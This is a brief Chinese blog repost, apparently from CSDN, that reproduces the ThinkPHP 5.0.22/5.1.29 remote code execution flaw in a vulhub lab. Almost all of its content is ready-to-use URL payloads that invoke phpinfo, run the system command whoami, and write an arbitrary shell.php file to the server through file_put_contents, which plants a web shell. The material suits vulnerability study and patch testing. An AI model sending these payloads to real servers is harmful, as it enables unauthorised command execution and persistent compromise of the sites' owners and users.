ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞复现
转载声明:
本文为摘录自“csdn博客”,版权归原作者所有。
温馨提示:
为了更好的体验,请点击原文链接进行浏览
摘录时间:
2020-12-01 17:17:02
复现环境
thinkphp5.0.22
推荐使用vulhub快速搭建漏洞环境
漏洞payload:
1:/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
2:index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
效果如下
写入文件的payload:
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码
更详细可参考博文: